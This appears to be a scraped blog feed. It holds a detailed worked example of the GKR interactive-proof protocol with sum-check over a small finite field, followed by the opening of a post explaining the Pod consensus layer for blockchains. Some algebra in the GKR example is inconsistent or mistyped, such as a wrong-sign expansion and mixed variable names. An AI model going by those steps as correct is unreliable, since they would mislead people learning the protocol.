• https://asc.di.fct.unl.pt/~jleitao/pdf/dsn07-leitao.pdf</a>

• https://www.bartoszsypytkowski.com/plumtree/</a>

• https://asc.di.fct.unl.pt/~jleitao/pdf/srds07-leitao.pdf</a>

• https://www.iroh.computer/proto/iroh-docs</a>

• https://www.iroh.computer/proto/iroh-blobs</a></p>
</p>


GKR protocol: a step-by-step example
Unknown — Wed, 05 Mar 2025 00:00:00 +0000
Introduction</h2>
An interactive proof is a protocol between two parties, a prover $\mathcal{P}$ and a verifier $\mathcal{V}$, where the prover attempts to convince the verifier of the validity of a statement. By leveraging randomness and interaction, the verifier can check the statement more efficiently than by doing everything himself. There is always a trivial way in which we can verify a computation: re-execution. This is how blockchains achieve verifiability: each node re-executes transactions and then reaches consensus. However, this is inefficient since every node must repeat the same computations, leading to bottlenecks. Succinct proofs allow us to check computations much faster, avoiding re-execution and solving blockchain scalability issues. For an introduction to interactive proof systems, see Thaler</a>. One such protocol is the sum-check protocol, proposed by Lund, Fortnow, Karloff, and Nisan in 1992, which is one of the building blocks used by several proof systems.</p>
The GKR protocol</a> (Goldwasser–Kalai–Rothblum) extends the idea of the sum-check protocol</a> for efficient verification of arithmetic circuits. The protocol allows a verifier to check that a computation—expressed as a logarithmic‐depth circuit with low-degree gates—has been executed correctly. This is achieved with only $O(\log⁡(n))$ rounds of interaction and a total of $O(\text{poly} \log(n))$ operations.</p>
The key idea of the GKR protocol is that instead of evaluating the entire circuit, it uses the sum-check</a> protocol recursively to verify the partial sums that represent the computed value efficiently. This method enables a resource-limited verifier to check computations far larger than what they could perform on their own by leveraging the underlying algebraic structure of the problem. The advantage of the GKR protocol is that one avoids having to commit to intermediate results in the circuit, which is usually the expensive part of many proof systems.</p>
This post will explain how the protocol works with an example. For additional explanations on the protocol, we recommend watching doubly efficient interactive proofs part 1</a> and part 2</a> or reading Thaler’s book</a> or this short note</a>. The GKR protocol is used to improve the LogUp lookup argument</a>. You can take a look at the implementation in Stwo</a>.</p>
Protocol</h2>
The goal of this post is to explain the protocol in detail. To do so, we will use a simple example and follow, step by step, everything that both the prover($\mathcal{P}$) and the verifier ($\mathcal{V}$) do.</p>
Note: We will consider the interactive version of the protocol. </span></span>
You can turn it into a non-interactive protocol with the Fiat-Shamir</span></span>
transformation. </span></span></code></pre>
Let’s begin by describing the computation we wish to prove. We must express the computation as a log-space uniform arithmetic circuit $\mathcal{C}$ of fan-in 2 over a finite field $\mathbb{F}_p$. This means that:</p>
    * The circuit has only two types of gates: addition and multiplication.</span></span>
    * It is layered so that each gate is connected to only two gates in the previous layer (possibly the same gate).</span></span>
    * In each layer $i$, the number of gates is $S_i = 2^{k_i}$ where $k_i \in \mathbb{N}$</span></span>
    * All values are elements of $\mathbb{F_{p}}$</span></span></code></pre>

Let’s build a circuit that meets these conditions:



Figure 1: Diagram of the arithmetic circuit used in the GKR protocol example.</p>
This circuit models a program that has 2 inputs and two outputs, and we work over the field $\mathbb{F_{23}}$.</p>
</blockquote>
The final goal of the protocol is for the prover to provide the outputs of the program to the verifier and convince the verifier that these outputs were computed correctly from the public inputs.</strong></h4>
Recall that both the circuit and the inputs are public.</p>
Part One: Sharing the Results</h2>
We can divide this into several steps:</p>
    1. Output Claim:</span></span></code></pre>
The prover $\mathcal{P}$ sends the verifier $\mathcal{V}$ the values claimed to be the circuit outputs. These values are sent in the form of a function</em> $D: {0,1}^{ k_0 } \to \mathbb{F_{p}}$.</p>

For our example: $k_0 = 1$, so $\mathcal{P}$ sends the linear polynomial $D$ satisfying:</p>
$$D(0) = 18$$ $$D(1) = 7$$</p>
</blockquote>
    2. Random Challenge:</span></span></code></pre>
A key resource we’ll use frequently in the protocol is having the verifier select a random point and send it to the prover. The prover must then incorporate this point into their calculations. This prevents the prover from precomputing results and trying to deceive the verifier.</p>
$\mathcal{V}$ picks a random $r_0 \in \mathbb{F}^{ k_0 }$ and send it to $\mathcal{P}$.</p>

Let’s pick $r_0 = 2$</p>
</blockquote>
    3. Computing the Multilinear Extension:</span></span></code></pre>
Both $\mathcal{V}$ and $\mathcal{P}$ compute $\tilde D(r_0)$, where $\tilde D({x})$ is the multilinear extension of $D$. This is the unique multilinear polynomial over $\mathbb{F_{p}}$ satisfying:

$$\tilde D(x) = f(x) \ \forall x \in {0, 1}^v$$</p>
This is a $v-$variate polynomial over $\mathbb{F_{p}}$ where $\tilde D({x})$ agrees with $D({x})$ at all boolean-valued (or bitstrings of a given length) inputs. It acts as a distance-amplifying encoding of $D({x})$ because, if another function $D’({x})$ disagrees at even a single input, the extension $\tilde D({x})$ will differ with $\tilde D’({x})$ at almost every point outside the original domain. This is a consequence of the Schwartz-Zippel lemma</a>, which states that the probability of choosing a zero of a polynomial at random is $v / \lvert \mathbb{F_p} \rvert$ (which is negligible for a sufficiently large field).</p>
Using Lagrange interpolation, we have:

$$\tilde f (x_1, \ldots, x_v) = \sum_{w \in {0, 1}^v} f(w) \cdot \chi_w(x_1, \ldots, x_v)$$</p>
where $\chi_w$ are the (multilinear) Lagrange basis polynomials: $$\chi_w(x_1, \ldots, x_v) = \prod_{i = 1}^{v} (x_i \cdot w_i + (1-x_i)(1-w_i))$$</p>

In our case (with $k_0=1$):</p>
$$\begin{align} \tilde D(x) &= D(0) : (x \cdot 0 + (1-x)(1-0)) + D(1) : (x \cdot 1 (1 - x)(1 - 1)) \newline

&= D(0)\cdot(1-x) + D(1) \cdot x= 18(1-x)+7x\end{align}$$</p>
Thus:</p>
$$\tilde D(r_0) = \tilde D(2) = -4 \equiv 19 \text{ mod } (23)$$</p>
We denote this value by:</p>
$$\tilde D(r_0) = 19 = m_0.$$</p>
</blockquote>
Now, we can see that verifying the program’s outputs comes down to checking that:

$$m_0 = \tilde W_0(r_0)$$</p>

Before continuing, let’s introduce an additional notation. For each layer $i$ of the circuit, we will denote</p>
$$W_i: \{0,1\}^{ k_i } \to \mathbb{F_{p}}$$</p>
to be the function that maps a node’s position to its actual value, let $\tilde W_i(x)$ be its multilinear extension.</p>

</p>
</blockquote>
With this notation, the verifier’s task can be seen as checking that</p>
$$D(x) = W_0(x)$$</p>
since $D(x)$ represents the claimed outputs and $W_0(x)$ represents the correct values. Because multilinear extensions are unique, this is equivalent to verifying that:</p>
$$\tilde D(x) = \tilde W_0(x)$$</p>
Finally, by the Schwartz-Zippel lemma, it suffices to check that</p>
$$\tilde D(r_0) = \tilde W_0(r_0)$$</p>
But wait! The verifier cannot directly access $W(x)$. That is precisely the point of the protocol!</strong></p>
Part Two: Modeling the circuit</h2>
In this phase, the goal is to verify that the sum of many terms (corresponding to a node’s computed value) equals $m_0$.</p>
To do this efficiently, we use the sum-check protocol.</p>
Introducing the Wiring Functions</h4>
We define two functions that capture the circuit’s wiring:</p>
    * **Addition Function**.</span></span></code></pre>
This function marks all the addition nodes in layer $i$. It takes as input:</p>
$$x \in \{0,1\}^{k_i + 2k_{i + 1}}$$</p>
which encodes the position $a$ of an addition node in the current layer, along with the positions $b$ and $c$ of the two nodes in the next layer to which it is connected.</p>
The function $\text{Add}_i$ is defined to be 1 when $x = (a,b,c)$ corresponds to a valid addition node with the proper inputs and zero otherwise.</p>
Just like with $\tilde D(x)$, we will need to create the multilinear extension: $\widetilde{\text{Add}}_i(x)$.</p>

In our circuit:



The output addition node is at position: $$a = (1)$$

And is connected to nodes: $$b: (1,0) \ \ c: (1,1)$$

Since this is the only addition node, we define the function:

$$\text{Add_1}(x) \begin{cases}

1 & \text{if } x = (1,1,0,1,1)\newline

0 & \text{if not}.

\end{cases}$$

We then extend this function to a multilinear polynomial, denoted $\widetilde{\text{Add}}_i(x)$:</p>
$$\widetilde{\text{Add}}_1 (x_1, x_2, x_3, x_4, x_5) = x_1 \cdot x_2 \cdot (1 - x_3) \cdot x_4 \cdot x_5 $$</p>
</blockquote>
    * **Multiplication Function**.</span></span></code></pre>
Similarly, we define the function $\text{Mult}_0(x)$ for the multiplication nodes and its multilinear extension.</p>

For the Multiplication node in our first layer:

$$\text{Mult_1}(x) \begin{cases}

1 & \text{if } x = (0,0,0,0,1)\newline

0 & \text{if not}.

\end{cases}$$

Its multilinear extension is given by

$$\widetilde{\text{Mult_1}}(x_1, x_2, x_3, x_4, x_5) = (1 - x_1) \cdot (1-x_2) \cdot (1 - x_3) \cdot (1 - x_4) \cdot x_5 $$</p>
</blockquote>
Finally, we need to connect these two new functions. For that, we can define a function that “computes” the value of a node in layer $i$ given the values in the next layer:</p>
$$\tilde f^{(i)}(a,b,c) := \widetilde{\text{Add_i}}(a,b,c)\cdot(\tilde W_{i + 1}(b) + \tilde W_{i + 1}(c)) + \widetilde{\text{Mult_i}} \cdot \tilde W_{i + 1}(b) \cdot \tilde W_{i + 1}(c)$$</p>
When this function is evaluated on the values $(a,b,c)$ corresponding to a node in layer $i$, it yields the value of that node.</p>

In our first layer:

$$\tilde f^{(0)}(0,0,0,0,1) = 18$$ $$\tilde f^{(0)}(1,1,0,1,1) = 7$$</p>
</blockquote>
This function is handy, but we can go one step forward and fix $a = r$ and sum over all possible binary assignments for $b$ and $c$, we obtain:</p>
$$\sum_{(b,c) \in \{0,1\}^{ 2k_i }} \tilde f^{(i)}(r,b,c) = \tilde W(r)$$</p>
This new function is now a univariate polynomial!</p>
Let us denote the function with $a$ fixed at $r$ as $\tilde f_r(b,c)^{(i)}$.</p>

Let’s go back a bit and not lose sight of the objective we had. We had reached the point where what we wanted to check was:

$$\tilde D(r_0) = \tilde W(r_0)$$</p>
or equivalently,</p>
$$\tilde W(r_0) = m_0$$</p>
So, with the new function $\tilde f$ we can think this as:</p>
$$\sum_{(b,c) \in {0,1}^{2k_i}} \tilde f_{r_0}^{(0)}(b,c) = m_0$$</p>
To verify this equality, which implies a lot of additions(operations), we will employ the Sum-Check protocol.</p>
Part Three: Sum-check</h2>
Let’s describe, step by step, all the operations performed by the prover and the verifier during this phase to better understand the protocol.</p>
    1. The prover $\mathcal{P}$ builds a new function $g_1(z)$:  </span></span></code></pre>
$$g_1(z): \mathbb{F_{p}} \to \mathbb{F_{p}}$$

$$g_1(z) := \sum_{ (x_2, x_3, … , x_{ 2k_1 }) \in \{0,1\}^{2k_1 - 1} } \tilde f_{r_0}^{(0)} (z, x_2, …, x_{2k_1 - 1})$$</p>
In other words, we leave the first coordinate of $x$ in $\tilde f_{r_0}^{(0)} (x)$ as the free variable $z$ and sum over all possible assignments of the remaining coordinates.</p>
Observe that this function satisfies:</p>
$$g_1(0) + g_1(1) = m_0$$</p>
Because $g_1(0)$ sums over all combinations with the first coordinate set to 0, and $g_1(0)$ does so for the first coordinate equal to 1.</p>

In our case, since $k_1 = 2$ (i.e. there are $2^2$ nodes in layer 2), we have:

$$g_1 (z) = \sum_{ (x_2, x_3, x_4) \in \{0, 1\}^3 } \tilde f_{r_0}^{(0)} (z, x_2, x_3, x_4).$$

$$\begin{align}

f_{ r_0 }^{(0)} (b, c) = & \ 2b_1 (1 - b_2) c_1 c_2 \Big[

(3(1 - b_1)(1 - b_2) + 6(1 - b_1)b_2 + 4b_1(1 - b_2) + 3b_1b_2) \notag \newline

& \quad + (3(1 - c_1)(1 - c_2) + 6(1 - c_1)c_2 + 4c_1 (1 - c_2) + 3c_1 c_2 ) \Big] \notag \newline

& - (1 - b_1)(1 - b_2)(1 - c_1)c_2 \notag \newline

& \Big[ (3(1 - b_1)(1 - b_2) + 6(1 - b_1)b_2 + 4b_1(1 - b_2) + 3b_1b_2 ) \notag \newline

& \quad \times (3(1 - c_1)(1 - c_2) + 6(1 - c_1)c_2 + 4c_1(1 - c_2) + 3c_1c_2) \Big]

\end{align}

$$

Now we have to keep $b_1$ fixed and $b_1,c_1, c_2$ change</p>
</blockquote>
$b_2$</th> $c_1$</th> $c_2$</th></tr></thead>

0</td> 0</td> 0</td></tr>
0</td> 0</td> 1</td></tr>
0</td> 1</td> 0</td></tr>
0</td> 1</td> 1</td></tr>
1</td> 0</td> 0</td></tr>
1</td> 0</td> 1</td></tr>
1</td> 1</td> 0</td></tr>
1</td> 1</td> 1</td></tr>
</tbody></table>

Due to the multiplicative factors (for example, terms like

$$2b_1(1 - b_2)c_1c_2$$

vanish unless $(c_1 = c_2 = 1)$ in the first term, and similarly in the second term), most combinations will contribute zero. In our case, let’s assume that after substitution, the only nonzero contributions come from:</p>
    * **Case 1:** When $(b_2, c_1, c_2) = (0, 1, 1)$</span></span>
    * **Case 2:** When $(b_2, c_1, c_2) = (0, 0, 1)$  </span></span></code></pre>
We now analyze these cases separately.</p>
</blockquote>

Case 1: $(b_2, c_1, c_2) = (0, 1, 1)$

$$2b_1 [3(1-b_1)+4b_1+3] \to 2x(x - 6)\to 2x^2 +12x$$

Case 2: $(b_2, c_1, c_2) = (0, 0, 1)$

$$-(1-b_1) [3(1 - b_1)+ 4b_1 ]6 \to -6(1 - x)(3 - 3x + 4x) \to (- 6 + 6x)(x + 3)$$

The sum leads to:

$$g_1(z) = 8z^2 + 24z - 18 \equiv 8z^2 + z - 18$$</p>
</blockquote>
The prover sends this polynomial (its low degree allows sending its coefficients directly) to the verifier.</p>
The verifier checks two things:</p>
    * That $g_1$ is indeed a low-degree polynomial.</span></span>
    * That:</span></span></code></pre>
$$g_1(0) + g_1(1) = m_0.$$</p>

In our example: $$g_1(0) = -18$$ $$g_1(1) = 14$$ $$g_1(0) + g_1(1) = -4 \equiv 19 = m_0.$$</p>
</blockquote>
    2. The verifier $\mathcal{V}$ chooses a random value $s_1 \in \mathbb{F_{p}}$ and sends it to the prover $\mathcal{P}$ . The verifier also computes:</span></span></code></pre>
$$g_1(s_1) = C_1$$</p>

We can sample $s_1$ = 3: $$g_1(s_1) = g_1(3) = 8 \cdot 3^2 + 24 \cdot 3 - 18 = 126 \equiv 11.$$</p>
</blockquote>
    3. Upon receiving $s_1$, $\mathbb{F_{p}}$ computes $C_1$ and then repeats a similar procedure. The prover defines a new function:</span></span></code></pre>
$$g_2(z): \mathbb{F_{p}} \to \mathbb{F_{p}}$$

$$g_2(z) := \sum_{(x_3, … , x_{2k_1}) \in \{0,1\}^{2k_1 - 2}} \tilde f_{r_0}^{(0)} (s_1, z, x_3 …, x_{ 2k_1 - 2})$$</p>
Here, the prover fixes the first variable to $s_1$ and leaves the second variable free (denoted by $z$), summing over the remaining binary assignments.</p>

We have:

$$g_2(z) = \sum_{(x_3, x_4) \in {0,1}^{2}} \tilde f_{ r_0 }^{(0)} (s_1, z, x_3, x_4)$$

$$g_2(z) = 162x^2 - 288x + 126 \equiv x^2 - 12x + 11.$$</p>
</blockquote>
    4. The prover $\mathcal{P}$ sends the coefficients of $g_2(z)$ to the $\mathcal{V}$.</span></span>
</span>
    5. The verifier checks that:</span></span></code></pre>
$$g_2(0) + g_2(1) = C_1$$</p>
$$g_2(0) = 0$$</p>

We must check: $$g_2(1) = 11$$ $$g_2(0) + g_2(1) = 11$$</p>
</blockquote>
    6. This procedure is repeated until the verifier receives  </span></span></code></pre>
$C_{2k+1}$:</p>
$$C_{ 2k + 1} := \tilde f_{ r_0 }^{(0)} (s_1, s_2, x_3 …, s_{ 2k_{ i + 1}})$$</p>
This is the final step of the Sum-Check protocol.</strong> At this point, the verifier would normally query an oracle to compute this value directly; however, in our protocol, the verifier can’t evaluate the function directly.</p>
The verifier can build $\widetilde{\text{Add}}$ and $\widetilde{\text{Mult_i}}$ but not to $\tilde W_{i+1}$, which represent the values of the nodes in the immediately preceding layer.</p>
What Have We Achieved?</h2>
In effect, we have reduced the problem of verifying the circuit’s outputs to verifying the values in one layer lower. This reduction is repeated layer by layer until the final layer is reached, which corresponds to the inputs the verifier already knows. This whole idea behind the protocol.</p>

Let’s do the math for our example:</p>
    * $\mathcal{V}$ samples $s_2 = 2$ and sends it to $\mathcal{P}$.</span></span>
</span>
    * $\mathcal{V}$ and $\mathcal{P}$ calculate $C_2 = g_2(s_2)$:$$g_2(s_2) = g_2(2) = 2^2 - 12 \cdot 2 + 11 = -9 \equiv 14.$$</span></span>
</span>
    * $\mathcal{P}$ calulates:$$g_3(z) = \sum_{x_4 \in {0,1}} \tilde {f_{ r_0 }^{(0)} (s_1, s_2, z, x_4)}$$ $$g_3(z) = 90x^2 - 180x + 144 \equiv 21x^2 - 19x + 6$$</span></span>
</span>
    * $\mathcal{V}$ receives $g_3(z)$ and checks:$$g_3(0) = 8 $$ $$ g_3(1) = 6 $$ $$g_3(0) + g_3(1) = 14$$</span></span>
</span>
    * $\mathcal{V}$ samples $s_3 = 4$ and sends it to $\mathcal{P}$.</span></span>
</span>
    * $\mathcal{V}$ and $\mathcal{P}$ calculate $C_3 = g_3(s_3)$:  </span></span></code></pre>
$$g_3(s_3) = 21 \cdot 4^2 - 19 \cdot 4 + 6 = 266 \equiv 13$$</p>
    * $\mathcal{P}$ calculates:  </span></span></code></pre>
$$g_4(z) = \tilde f_{r_0}^{(0)} (s_1, s_2, s_3, z)$$ $$g_4(z) = -288z^2 + 1152x \equiv 11z^2 + 2z$$</p>
    * $\mathcal{V}$ receives $g_4(z)$ and checks:  </span></span></code></pre>
$$g_4(0) = 0$$ $$g_4(1) = 13 $$ $$g_4(0) + g_3(1) = 13$$</p>
    * $\mathcal{V}$ samples $s_4 = 7$ and sends it to $\mathcal{P}$.</span></span>
</span>
    * $\mathcal{V}$ and $\mathcal{P}$ calculate $C_4 = g_4(s_4)$:  </span></span></code></pre>
$$g_4(s_4) = 553 \equiv 1$$</p>
    * $\mathcal{P}$ calulates  </span></span></code></pre>
$$\tilde f^{(0)}_{r_0}(s_1,s_2,s_3,s_4) = c_4$$

$$\begin{equation}

\begin{aligned}

\tilde{f}^{(0)}(r_1,s_1,s_2,s_3,s_4) := & \newline \widetilde{\text{Add}}_1(r_1,s_1,s_2,s_3,s_4) \cdot (\tilde{W}_2(s_1,s_2) + \tilde{W}_2(s_3,s_4)) \newline

& + \widetilde{\text{Mult}}_1(r_1,s_1,s_2,s_3,s_4) \cdot \tilde{W}_2(s_1,s_2) \cdot \tilde{W}_2(s_3,s_4)

\end{aligned}

\end{equation}$$</p>
</blockquote>
Part four: Recursion</h2>
We reached a stage where the verifier’s goal is to check that</p>
$$\tilde f_{ r_0 }^{(0)} (s_1, s_2, x_3, …, s_{2k_{i + 1}}) = C_1$$</p>
However, to do so, the verifier would need to know:</p>
$$\tilde W_2(s_1, s_2, … , s_{k + 1})$$ $$\tilde W_2(s_{ k + 1}, … , s_{ 2k + 1})$$</p>
If the verifier were to perform two separate sum-checks for these values, the final workload would be excessive. Instead, the prover makes a single claim at one point. How?</p>
Both parties compute the unique function</p>
$$\ell: \mathbb{F} \to \mathbb{F}^{2k}$$</p>
such that:</p>
$$\ell(0) = (s_1, s_2, … , s_{k+1})$$ $$\ell(1) = (s_{k + 1}, … , s_{2k + 1})$$</p>
Then $\mathcal{P}$ sends the function:

$$q = \tilde W_2 \circ \ell : \mathbb{F} \to \mathbb{F}.$$</p>
to the verifier. Notice that:</p>
$$q(0) = \tilde W_2(s_1, s_2, … , s_{k+1})$$ $$q(1) = \tilde W_2(s_{k+1}, … , s_{2k+1})$$</p>
Thus, by knowing $q(x)$, the verifier can recover the necessary values $q(0)$ and $q(1)$ to complete the final evaluation in the Sum-Check protocol.</p>
So, with $q(x)$, $\mathcal{V}$ can use $q(0)$ and $q(1)$ to do the last evaluation in the sumcheck protocol.</p>
But how does the verifier know that $q(x)$ is correct? Again, $\mathcal{V}$ samples a random element $r∗ \in \mathbb{F}$ and computes</p>
$$r_1 = \ell (r^*)$$</p>
Then, $\mathcal{P}$ and $\mathcal{V}$ compute:</p>
$$m_1 = q(r_1)$$</p>
Now, the prover’s task is to convince the verifier that:</p>
$$\tilde W_2(r_1) = m_1$$</p>
This claim is analogous to our initial verification step:</p>
$$\tilde D(r_0) = m_0$$</p>
where $\tilde D(x)$D encoded the output values and now $\tilde W_2(x)$ encodes the values of the nodes in the immediately preceding layer.</p>
Thus, the remaining task is to apply the same Sum-Check protocol to this new layer.</p>

For our circuit:</p>
    * $\mathcal{P}$ and $\mathcal{V}$ calculate:  </span></span></code></pre>
$$\ell(0) = (s_1, s_2) = (3, 2)$$ $$ \ell(1) = (s_3, s_4) = (4, 7)$$ $$\ell(x) = (s_1(1-x) + s_3x, s_2(1-x) + s_4x) = (3(1-x) + 4x, 2(1-x) + 7x).$$
* $\mathcal{P}$ sends $q= \tilde W_1 \circ \ell : \mathbb{F} \to \mathbb{F}.$

$$q(x) = -20x^2 -52x - 12 \equiv 3x^2 + 17x + 11$$
* $\mathcal{V}$ checks $\tilde f_{r_0}^{(0)} (s_1, s_2, s_3, s_4) = c_4$ using $q(x)$
* $\mathcal{V}$ sends $\mathcal{P}$ a random $r^* \in \mathbb{F}$

$$r^* = 6$$
* $\mathcal{V}$ and $\mathcal{P}$ calculate:

$$r_1 = \ell (6) = (9, 32) \equiv (9,9)$$ $$m_1 = q(6) = 14.$$
* Now $\mathcal{P}$ needs to convice $\mathcal{V}$ that:

$$\sum_{(b, c) : \in {0, 1}^{2 \cdot 1}} f_{r_1}^{(1)} (b, c) = m_1$$
* $\mathcal{P}$ calculates $g_1(z)$ and sends it to $\mathcal{V}$ :

$$g_1(z) = \sum_{x_2 \in {0, 1}} f_{r_1}^{(1)} (z, x_2)$$ $$g_1(z) = 2z^2 + 7z + 14$$
* $\mathcal{V}$ checks $g_1(0) + g_1(1) = m_1$:

$$ g_1(0) = 14 $$ $$ g_1(1) = 0 $$ $$ g_1(0) + g_1(1) = 14$$
* $\mathcal{V}$ samplse $s_1 = 12$ and sends it to $\mathcal{P}$.
* $\mathcal{V}$ and $\mathcal{P}$ calculates $C_1 = g_1(s_1)$:

$$g_1(12) = 2 \cdot 12^2 + 7 \cdot 12 + 14 = 386 \equiv 18$$
* $\mathcal{P}$ calculates $g_2(z)$ and send it to $\mathcal{V}$:

$$g_2(z) = \tilde f_{r_1}^{(1)} (s_1, z)$$ $$g_2(z) = 9z^2 + z +4$$
* $\mathcal{V}$ checks $g_2(0) + g_2(1) = C_1$:

$$g_2(0) = 4$$ $$g_2 (1) = 14$$ $$ g_2(0) + g_2(1) = 18$$
* $\mathcal{V}$ samples $s_2 = 5$ and sends it to $\mathcal{P}$.
* $\mathcal{V}$ and $\mathcal{P}$ calculate $C_2 = g_2(s_2)$:

$$C_2 = g_2(5) = 4$$
* $\mathcal{P}$ and $\mathcal{V}$ calculate:

$$ \ell(0) = s_1 = 12$$ $$ \ell(1) = s_2 = 5$$ $$\ell(x) = -7x + 12$$
* $\mathcal{P}$ sends $q= \tilde W_1 \circ \ell : \mathbb{F} \to \mathbb{F}.$

$$q(x) = 3(1 - (-7x + 12) ) + (-7x +12)$$
* $\mathcal{V}$ checks $f_{r_1}^{(1)}(s_1,s_2) = c_2$ using $q(x)$
* $\mathcal{V}$ sends $\mathcal{P}$ a random $r^* \in \mathbb{F}$

$$r^* = 17$$
* $\mathcal{V}$ and $\mathcal{P}$ calculate:

$$r_2 = \ell (17) = 8$$ $$m_2 = q(17) = 10$$
* Finally, $\mathcal{V}$ calculates $\tilde W_2(x)$ and checks $\tilde W_2(r_2) = m_2$

$$W_2(0) = 3$$ $$W_2(1) = 1$$ $$\tilde W_2(x) = 3(1 - x) + x$$ $$\tilde W_2(8) = 10$$</p>
</blockquote>
Last part: repeat</h2>
Well, everything is almost ready! We just need to repeat this procedure once per layer. Finally, $W_d(x)$ is the function that maps the program’s inputs, which we will use to verify the sum-check of layer $d-1$. If this check is correct, it means that all the previous ones are also correct, so we can confidently say that the computation was executed correctly.</p>
Conclusion:</h2>
In summary, the GKR protocol elegantly reduces the problem of verifying the output of a complex arithmetic circuit into a series of simpler verifications that recursively move from the output layer to the input layer. Each step relies on algebraic properties—most notably, the uniqueness of multilinear extensions and the Schwartz–Zippel lemma—to ensure that a resource-limited verifier can efficiently confirm the correctness of the computation. This protocol illustrates the power of interactive proofs and lays the foundation for more advanced cryptographic applications such as zero-knowledge proofs.</p>


Why we believe that Pod, an optimal-latency, censorship-free, and accountable generalized consensus layer, is a groundbreaking technology for blockchains and distributed systems
Unknown — Thu, 13 Feb 2025 00:00:00 +0000
TL;DR:</strong> This post discusses Pod</a>, a new notion of consensus that achieves optimal latency of one round-trip (about 200 ms), by removing inter-replica communication. We believe this paper and the work by pod network is groundbreaking and we want others to share our excitement and passion for their work, that’s why we wrote our understanding of what they have found and created.</p>
The construction is simple and can be implemented in a few hundred lines of code in Rust. While the construction has weaker properties than total order broadcast, it still remains censorship resistant against Byzantine replicas, has accountability for safety violations and achieves low latency. In simpler terms, Pod removes the consensus from the blockchain equation, and allows transactions to happen as fast as ordinary searches on the web. This enables several applications, such as payments, auctions and decentralized data stores.</p>
Introduction: The Problem of Consensus in Blockchain</h2>
Blockchain technology has revolutionized the way we think about decentralized trust and distributed ledgers. At its heart lies the problem of consensus—the mechanism by which a network of untrusted parties agrees on the state of a shared ledger. Consensus protocols are responsible for ensuring that every transaction is confirmed, ordered, and irrevocably recorded while preserving key properties such as safety (no two honest nodes disagree on the ledger’s content) and liveness (transactions submitted by honest parties eventually become part of the ledger). One of the reasons why consensus is introduced is to prevent double spending: a party could sign two transactions using the same funds and try to have them approved by the ledger, effectively creating money out of thin air. The fact that one transaction must come before another prevents this, but we will see that consensus is not necessary to achieve this.</p>
In classical distributed systems, consensus has been studied for decades, giving rise to robust algorithms that guarantee agreement among a small set of trusted parties. However, blockchains must operate in an open, permissionless setting where nodes may be geographically dispersed, and some may behave maliciously. The result is that consensus in blockchains must address several additional challenges:</p>
    * **Scalability and Throughput:** Many early blockchains—most notably Bitcoin—suffer from severe throughput limitations (e.g., around 7 transactions per second) and high latency (e.g., waiting up to 10 minutes for finality). These numbers pale in comparison to conventional payment systems like Visa, which processes tens of thousands of transactions per second.</span></span>
    * **Security and Byzantine Fault Tolerance:** The consensus algorithm must tolerate Byzantine faults (arbitrary and potentially malicious behavior) while ensuring that honest nodes do not disagree on the ledger’s contents.</span></span>
    * **Latency and Finality:** In many applications, the time between a client’s submission of a transaction and the transaction’s irreversible finalization is critical. High latency not only degrades user experience but can also open the door to adversarial exploits such as front-running.</span></span>
    * **Economic Incentives and Censorship Resistance:** The design of consensus protocols must account for economic incentives. For example, leader-based systems (where one node is given the right to propose the next block) can be vulnerable to censorship or manipulation if the leader is bribed or coerced.</span></span></code></pre>
These challenges have motivated researchers and practitioners to seek new designs that minimize latency and improve throughput without compromising security.</p>
Classical Consensus and Its Limitations</h2>
Traditional consensus protocols—such as Paxos, Raft, and Byzantine Fault Tolerant</a> (BFT) algorithms—were originally designed for closed systems with a fixed number of nodes. These algorithms guarantee that if a message is accepted by one correct node, then it will eventually be accepted by all correct nodes (safety), and that new messages are eventually delivered (liveness). In the classical sense, consensus is achieved via multiple rounds of communication among nodes. This typically involves a leader or coordinator who proposes a value, and then the other nodes exchange messages to reach agreement.</p>
However, these algorithms suffer from several limitations when applied to blockchain:</p>
    * **Communication Overhead:** Multiple rounds of message exchanges among all nodes lead to significant communication overhead. In a globally distributed network, this overhead translates into higher latency.</span></span>
    * **Leader-Based Bottlenecks:** Leader-based approaches centralize the ordering of transactions. While this can simplify the process of reaching consensus, it also creates vulnerabilities. A malicious or compromised leader can censor transactions, reorder them for personal gain (e.g., in the case of MEV), or cause delays.</span></span>
    * **Scalability:** Traditional consensus protocols are designed for small, known groups of nodes. Scaling these protocols to thousands of nodes (or more) in an open, permissionless network poses significant challenges in terms of both security and performance.</span></span>
    * **Latency:** Even in the best-case scenario, achieving consensus requires multiple network round trips. The lower bound for many protocols is expressed in terms of δ (the network delay). For instance, protocols based on Byzantine agreement have been shown to require at least t + 1 rounds (where t is the number of tolerated faults) in the synchronous setting, or at least 2n/(n – t) rounds in the asynchronous case.</span></span></code></pre>
Because of these inherent limitations, blockchain systems that rely on traditional consensus (or their direct adaptations) often suffer from high transaction confirmation times, limiting their utility for applications that demand near-instant finality.</p>
Consensus in Blockchains</h2>
Bitcoin introduced a revolutionary approach to consensus by using Proof-of-Work (PoW) to elect a leader probabilistically. In Bitcoin’s protocol, nodes (miners) compete to solve a cryptographic puzzle, and the first to solve it earns the right to propose the next block. While this approach has the advantage of being robust in an open, trustless environment, it also introduces significant inefficiencies:</p>
    * **High Latency:** The block interval in Bitcoin is deliberately long (approximately 10 minutes) to reduce the probability of forks, resulting in slow confirmation times.</span></span>
    * **Energy Consumption:** PoW requires vast amounts of computational power and energy.</span></span>
    * **Finality Uncertainty:** Because Bitcoin’s chain can fork, finality is probabilistic. A transaction is typically considered “final” only after several blocks have been added to the chain (e.g., six confirmations).</span></span></code></pre>
Subsequent blockchain designs, such as Ethereum’s Proof-of-Stake (PoS) and various Byzantine Fault Tolerant (BFT) protocols, have attempted to reduce latency and improve throughput. Yet, many of these systems still rely on multi-round communication or leader-based architectures that inherently limit performance.</p>
The Quest for Low-Latency Consensus</h2>
The fundamental challenge for any blockchain consensus mechanism is the trade-off between the number of communication rounds (which directly impacts latency) and the security guarantees provided. The ideal scenario would be to achieve the “physically optimal” latency: a one-round-trip delay for writing a transaction and a one-round-trip delay for reading it—totaling 2δ, where δ is the actual network delay. This is the physical limit, as the information must travel from the writer to the replicas and then from the replicas to the reader.</p>
Achieving such low latency, however, is not trivial. Eliminating inter-replica communication (which normally is required to guarantee total ordering and agreement) means that the system must forgo some of the stronger guarantees provided by classical consensus protocols. Instead, Pod aims for a “generalized consensus” that focuses on obtaining useful, application-specific information with minimal delay.</p>
Beyond Total-Order Broadcast: A New Paradigm</h2>
Most traditional blockchain consensus protocols focus on the total-order broadcast model. This means that every transaction is ordered sequentially, and all nodes agree on this order. While this is essential for certain applications, it is often overkill for other applications.</p>
